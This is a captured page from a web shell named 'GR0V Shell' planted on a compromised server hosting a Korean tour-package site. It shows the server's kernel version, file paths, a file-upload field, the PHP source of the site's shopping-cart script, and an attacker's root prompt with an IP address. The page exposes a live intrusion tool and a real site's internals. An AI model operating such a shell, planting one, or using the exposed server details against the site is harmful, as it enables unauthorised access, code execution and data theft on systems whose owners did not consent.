? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/private_html/happyezystyle/
File Upload :
Current File : /home/admin/domains/happytokorea.com/private_html/happyezystyle/cart_cal.php

<?
ob_start();
session_start();
include"include/config.inc.php";

if (count($prd_del)==0) {
	$prd_del=array();
}
for ($i=0;$i<count($sess_idproduct);$i++) {
		if (!in_array($sess_idproduct[$i],$prd_del)) {
			$temp_id[]=$sess_idproduct[$i];
			$temp_name_prd[]=$sess_name_prd[$i];
			$temp_price[]=$sess_price[$i];
			$temp_num[]=$prd_num[$i];
		}
}
$sess_idproduct=$temp_id;
$sess_name_prd=$temp_name_prd;
$sess_price=$temp_price;
$sess_num=$temp_num;

if ($calculate) {		
		header("Location: Cart.php");
} else if ($complete) {
		header("Location: Order.php");
}else if ($continue) {
		header("Location: Products.php");
}

?>

T1KUS90T
  root-grov@210.1.60.28:~$